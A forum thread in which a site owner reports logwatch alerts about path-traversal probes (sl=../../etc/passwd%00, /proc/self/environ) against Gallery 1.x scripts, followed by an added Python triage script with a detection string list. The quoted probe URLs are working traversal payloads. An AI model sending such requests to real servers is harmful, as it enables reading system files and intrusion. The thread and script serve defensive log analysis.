Security -- Possible successful probes

rioguia

Joined: 2003-12-20
Posts: 22
Posted: Thu, 2009-05-07 01:33

I have received logwatch warnings about possible successful probes apparently referencing gallery 1.15.10 version software.
/gallery/album_list.php/?sl=../../../../../../../etc/passwd%00? HTTP Response 200
/gallery/index.php?sl=../../../../../../../etc/passwd%00? HTTP Response 200

I would be happy to provide logs and other information to a developer.

 
rioguia

Joined: 2003-12-20
Posts: 22
Posted: Thu, 2009-05-07 10:00

Results from last night's logwatch

A total of 13 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

//index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200
/gallery/slideshow.php?mode=low&set_albumName=album167//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/gallery//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/?&mailform/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/?&mailform/index.php?sl=../../../../../../../etc/passwd%00 HTTP Response 200
/?Guest_Book//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/?Guest_Book/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/index.php?sl=./../../../../../../../proc/self/environ%00 HTTP Response 200
/gallery/album_list.php/?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200
/gallery/slideshow.php?mode=applet&set_albumName=album194//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
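
Added example, not part of the original posts and not Gallery or logwatch code: logwatch flags these requests because the URL matches a suspicious string and the status is 200, but a script that ignores an unknown parameter also answers 200 with its normal page. The sketch below triages such lines by comparing each flagged response's size with normal responses for the same script. The log lines, addresses, sizes, the 2% tolerance and the verdict names are constructed assumptions, and a matching size is a heuristic, not proof.

```python
import re
from collections import defaultdict
from urllib.parse import unquote
# Constructed sample in Apache combined format; addresses and sizes are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [07/May/2009:01:10:02 -0400] "GET /gallery/index.php HTTP/1.1" 200 18432 "-" "Mozilla/5.0"
203.0.113.9 - - [07/May/2009:01:12:44 -0400] "GET /gallery/index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 200 18432 "-" "-"
203.0.113.9 - - [07/May/2009:01:12:45 -0400] "GET /index.php?sl=./../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1204 "-" "-"
203.0.113.9 - - [07/May/2009:01:12:46 -0400] "GET /gallery/album_list.php/?sl=../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "-"
"""
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')
SUSPICIOUS = ("../", "\x00", "/etc/passwd", "/proc/self/environ")  # assumed match list

def parse(log):
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            ip, url, status, size = m.groups()
            yield ip, url, int(status), 0 if size == "-" else int(size)

def split(url):
    path, _, query = url.partition("?")   # urlsplit would read "//index.php" as a host
    script = re.sub(r"/+", "/", path).rstrip("/") or "/"
    return script, unquote(query)         # %00 becomes a real NUL after decoding

def is_probe(url):
    return any(s in split(url)[1] for s in SUSPICIOUS)

def triage(log, tolerance=0.02):
    rows = list(parse(log))
    baseline = defaultdict(list)          # script -> sizes of normal 200 responses
    for _, url, status, size in rows:
        if status == 200 and not is_probe(url):
            baseline[split(url)[0]].append(size)
    results = []
    for ip, url, status, size in rows:
        if not is_probe(url):
            continue
        normal = baseline.get(split(url)[0], [])
        if status != 200:
            verdict = "rejected"
        elif not normal:
            verdict = "no-baseline"       # nothing to compare with: review by hand
        elif any(abs(size - n) <= tolerance * n for n in normal):
            verdict = "same-as-normal-page"
        else:
            verdict = "size-differs"      # body is not the usual page: inspect it
        results.append((ip, url, status, size, verdict))
    return results
if __name__ == "__main__": print(*triage(SAMPLE_LOG), sep="\n")
```

Requests marked `size-differs` or `no-baseline` are the ones to check against the saved response or by replaying the request on a test copy of the site.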